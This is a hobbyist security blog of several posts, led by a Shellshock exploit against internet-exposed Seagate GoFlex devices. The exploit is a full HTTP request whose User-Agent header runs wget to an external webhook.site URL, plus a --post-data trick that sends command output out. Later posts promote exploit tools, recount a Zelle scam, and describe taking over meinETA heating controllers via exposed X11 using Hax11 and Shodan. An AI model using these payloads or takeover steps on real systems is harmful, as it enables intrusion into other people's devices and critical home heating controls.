Getting a remote shell on Seagate GoFlex devices is still a thing almost ten years later!

Since I have been on a stroll down memory lane, I thought it would be fun to also revisit some of the bigger issues I have reported on in the past, like Getting a remote shell on any one of 68,000+ Seagate GoFlex devices. I found these devices are still plentiful on Shodan and despite all the time that has past. That's not all as they now easier to verify thanks to web services like webhook.site. In the past verifying you had RCE with these devices and the Shellshock bug in general could be tricky, but having something available to the public that catches callbacks makes it so much simpler. 

Here is what the new payload looks like using webhook.site:

GET /support/ HTTP/1.1

Host: vuln.device.ip.here

User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo;

 PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget

 http://webhook.site/866285eb-9c4f-4269-997c-6c4d3a960139/a -O /tmp/junk2>&1;

Here is what it looks like when it hits webhook:

If your testing this out your self and using webhook to verify execution, and you see something like the above on your webhook session, w00t! You have just successfully verified its vulnerable to shellshock, it has wget installed and its allowed to make calls outside of its network!

Going a bit further you can also exploit this Shellshock webhook.site combo to exfiltrate some information from our target by adding the --post-data flag to our wget payload with a bash command surrounded by backticks, like this:

--post-data `id`

wget will send the output of the command as post data to webhook :)  

It blows my mind we can still find these on the internets, and even more so that after 9 years no one is patching anything. If you have devices in your network, please for the love of all that is good, update your firmware! 

That's it for now, enjoy the 1's and 0's

Arctic Code Vault Contributor: ✓

Since I am on an ego trip, I thought I would gloate some more by reminding all of a tool a developed with a friend of mine called Upnp-Exploiter back when I still ran DC414 that made it into the Github Arctic Code Vault! So even after the zombie apocalypse, you can use my tool :) If you don't know what the Vault project is you can read more about it Here. I am deeply honored by this and many thanks to Github for including our project! 

That's not all for this project however, another friend of mine caught a glimpse of it being used in a pentest by a company called TraceSecurity! Below is a screen capture of it in the pentest report :) Nothing makes me more prouder than my tools being used by fellow ethical hackers. I hope they got some findings with it on another host! 

That's all for now. Enjoy the 1's and 0's.

Hack3r Achievement Obtained!

You may have seen on my X feed by now, but if not. I am proud to say my IPMIPWN tool was added to not only Kali Linux, but to BlackArch Linux as well!! This happened earlier, but I haven't bragged on the blog yet :) It's so amazing it was so well liked and used! I hope it has helped many hackers in their education and professional careers. 

If you somehow don't know about these projects, welcome skiddy and go here and here and RTFM :P 

I loving giving back to the scene that has helped me so much and I am always trying to do more. Now I can say I honestly have in a "I hope" meaningful way! Thanks to whoever found my tool worthy and all the people at the Kali and BackArch organizations. You are all awesome! Thank you!!

Enjoy the 1's and 0's :)

Go Tell That Spammer, The Scammer, The Crypto Jacker. Tell'em That God's Gonna Cut'em Down.

I HATE spammers, scammers, and just anything evil that tries to capitalize on the regular user, and for the most part I haven't really had any run ins with them, but them bastards are getting crafty and crossed paths with me so I thought I would share the tactics I observed and some of their junk. 

I will start with a Facebook/Zelle scan that was tried against my wife. So Cmoney was posting stuff on FB to sell, she was asking around $200 for the item and she got a hit that same night at around 4AM. He wanted to pay and come get it ASAP, but said he wanted to use Zelle to buy it then come get it later that day. as he was at work. We didn't use Zelle so we asked if he could use any other service, which he said no and said he will pass. Well Cmoney wanted to sell this thing so we got a Zelle account to accommodate this guy. We gave him our Zelle info to send money, which he then says he sent the payment, but nothing showed up on our end, then an email came saying this BS:

For your account to be credited fully with the sum of $230.00 USD You are required to send the sum of 

$100.00 USD (FIRST) to the buyer’s Zelle information for your buyer’s safety

We of course were all, yeah f that. Thats when I took a deeper look at the email from "Zelle" and noticed the from address was zellepay.customerservices024975@gmail.com which is obviously not a Zelle email, but you dont see that URL until  you go into header details, just a hover over the form/to area in gmail shows the below:

So the email is so long that google cuts off the TLD and all you see is the zelle portion. Here is a look at the expanded headers view:

So here there are some clues to its fakeness as you can see the gmail domain. However note the red box, GOOGLE SAYS IT'S AN IMPORTANT EMAIL!!! This is crazy and adds to its legitimacy.

Well we figure WTH and played along, but tell him we cant send the 100 bucks first. He then says he will pay it as long as we pay it back. We say sure we will pay it back no problem. We then get an email saying Zelle got it and all is good, he thought we would just send the 100 right away, but nah lol. We told him as soon as he sends the money for the item we will send his money back. We never heard back lol. I guess they don't like going off script. Maybe next time :) 

Enjoy the 1's and 0's.

Getting GSMEvil2 working on Debian.

So MOST of the instructions on GSMEvil2's github work fine with the exception of the pip guidance. Here is what I had to use to get it working:

pip3 install pyshark flask flask_socketio==4.3.2 pysqlite3

Yeah its a short post,  Deal with it :P

Heating control system meinETA open to attack with Hax11

meinETA is a heating control system that can be accessed remotely via a password protected portal, however since it uses X11 to expose the GUI to the user, if you can get the IP of the meinETA system this portal can be bypassed and you can manipulate the system directly with Hax11 as seen below.

The ETA site says this about meinETA:

meinETA: the free internet platform
If your heating boiler is connected to the internet, you can see and change all heating settings on your mobile, tablet or PC. So you always have a handle on your heating, wherever you are! When you login to www.meinETA.at, you see the touchscreen as if you were standing right in front of the boiler!

This means that with Hax11 you have full control of the system, without the need for the portal, just needing the systems IP. This would seem to be a big hurdal, but a few minutes on shodan and you can track systems down and be in full control with just a few keystrokes and clicks of the mouse. There doesn't seem to be any sort of authentication on the GUI, not even a pin code so there is nothing stopping you once you locate one. 

More on ETA

Get Hax11 HERE

Update to Hax11 allows connect to more display ports for larger attack surface

 I have updated Hax11 to connect to non-default display ports. The previous version only allowed connecting to display 0 "port 6000", but now you can connect to any a system has available. 

Example:

If you want to connect to display 1 "port 6001" use this command:

python hax11.py ip.addr.here 1

If you want to connect to display 0 use the old command style:

python hax11.py ip.addr.here

You can connect to display 1, 2, 3, and so on. I know it seems like a small change, but it doubles or more your attack surface. So while the change is small, the impact is big. 

Get it HERE

Enjoy!